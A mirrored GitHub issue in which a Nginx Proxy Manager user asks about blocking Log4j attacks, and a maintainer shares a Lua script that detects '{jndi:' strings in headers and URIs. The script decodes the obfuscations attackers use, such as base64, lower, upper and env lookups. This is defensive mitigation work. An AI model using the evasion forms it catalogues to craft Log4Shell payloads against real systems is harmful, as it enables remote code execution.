[GH-ISSUE #1655] Log4j Header recognition #1239

New issue

Closed

opened 2026-02-26 06:36:21 +03:00 by kerem · 1 comment

kerem commented

2026-02-26 06:36:21 +03:00

Owner

Originally created by @lvefferen on GitHub (Dec 15, 2021).
Original GitHub issue: https://github.com/NginxProxyManager/nginx-proxy-manager/issues/1655

Can Nginx Proxy Manager detect (and block) scan/attacks done with Log4j exploit? by enabling "Block Common Exploits" option?

Originally created by @lvefferen on GitHub (Dec 15, 2021). Original GitHub issue: https://github.com/NginxProxyManager/nginx-proxy-manager/issues/1655 Can Nginx Proxy Manager detect (and block) scan/attacks done with Log4j exploit? by enabling "Block Common Exploits" option?

kerem

2026-02-26 06:36:21 +03:00

closed this issue
added the
question
label

kerem commented

2026-02-26 06:36:22 +03:00

Author

Owner

@chaptergy commented on GitHub (Dec 15, 2021):

You can add something via the advanced config to temporarily try and reduce the risk. However this should NOT be more than a very temporary workaround until you have patched your Java applications! That's why this shouldn't be a default "exploit" to block. Furthermore as every single header and other content needs to be scanned for various specific strings, and this is only possible by using a lua script, this comes with a huge performance penalty.

But as I said for a temporary thing, you can use the advanced config and using a script like the one created by infiniroot:

# LUA block to detect, block and log Log4Shell attacks (C) Infiniroot 2021 (@infiniroot)
# with lua fixes and other enhancements from Andreas Nanko (@andreasnanko)
rewrite_by_lua_block {

function decipher(v)
    local s = tostring(v)
    s=ngx.unescape_uri(s)
    if string.find(s, "${base64:") then
      t=(string.gsub(s, "${${base64:([%d%a%=]+)}}", "%1"))
      s=string.gsub(s, "${base64:([%d%a%=]+)}", tostring(ngx.decode_base64(t)))
    end
    s=string.gsub(s, "${lower:(%a+)}", "%1")
    s=string.gsub(s, "${upper:(%a+)}", "%1")
    s=string.gsub(s, "${env:[%a_-]+:%-([%a:])}", "%1")
    s=string.gsub(s, "${::%-(%a+)}", "%1")
    if string.lower(s) == string.lower(tostring(v)) then
      return string.lower(s)
    else
      return decipher(s)
    end
end

local req_headers = "Headers: ";
local h, err = ngx.req.get_headers()
for k, v in pairs(h) do
  req_headers = req_headers .. k .. ": " .. tostring(v) .. "\n";
  if v then
    if string.match(decipher(v), "{jndi:") then
      ngx.log(ngx.ERR, 'Found potential log4j attack in header ' .. k .. ':' .. tostring(v))
      ngx.exit(ngx.HTTP_FORBIDDEN)
    end
  else
    if err then
      ngx.log(ngx.ERR, "error: ", err)
      return
    end
  end
end
local uri = tostring(ngx.var.request_uri)
if string.match(decipher(uri), "{jndi:") then
      ngx.log(ngx.ERR, 'Found potential log4j attack in request: ' .. uri )
      ngx.exit(ngx.HTTP_FORBIDDEN)
end
}

@chaptergy commented on GitHub (Dec 15, 2021): You can add something via the advanced config to temporarily try and reduce the risk. However this should NOT be more than a very temporary workaround until you have patched your Java applications! That's why this shouldn't be a default "exploit" to block. Furthermore as every single header and other content needs to be scanned for various specific strings, and this is only possible by using a lua script, this comes with a huge performance penalty. But as I said for a temporary thing, you can use the advanced config and using a script [like the one created by infiniroot](https://www.infiniroot.com/blog/1155/using-nginx-lua-script-mitigate-log4shell-cve-2021-44228-vulnerability): ```lua # LUA block to detect, block and log Log4Shell attacks (C) Infiniroot 2021 (@infiniroot) # with lua fixes and other enhancements from Andreas Nanko (@andreasnanko) rewrite_by_lua_block { function decipher(v) local s = tostring(v) s=ngx.unescape_uri(s) if string.find(s, "${base64:") then t=(string.gsub(s, "${${base64:([%d%a%=]+)}}", "%1")) s=string.gsub(s, "${base64:([%d%a%=]+)}", tostring(ngx.decode_base64(t))) end s=string.gsub(s, "${lower:(%a+)}", "%1") s=string.gsub(s, "${upper:(%a+)}", "%1") s=string.gsub(s, "${env:[%a_-]+:%-([%a:])}", "%1") s=string.gsub(s, "${::%-(%a+)}", "%1") if string.lower(s) == string.lower(tostring(v)) then return string.lower(s) else return decipher(s) end end local req_headers = "Headers: "; local h, err = ngx.req.get_headers() for k, v in pairs(h) do req_headers = req_headers .. k .. ": " .. tostring(v) .. "\n"; if v then if string.match(decipher(v), "{jndi:") then ngx.log(ngx.ERR, 'Found potential log4j attack in header ' .. k .. ':' .. tostring(v)) ngx.exit(ngx.HTTP_FORBIDDEN) end else if err then ngx.log(ngx.ERR, "error: ", err) return end end end local uri = tostring(ngx.var.request_uri) if string.match(decipher(uri), "{jndi:") then ngx.log(ngx.ERR, 'Found potential log4j attack in request: ' .. uri ) ngx.exit(ngx.HTTP_FORBIDDEN) end } ```

No milestone

No project

No assignees

1 participant

Notifications

Due date

The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference

starred/nginx-proxy-manager-NginxProxyManager#1239

No description provided.

Rows
Columns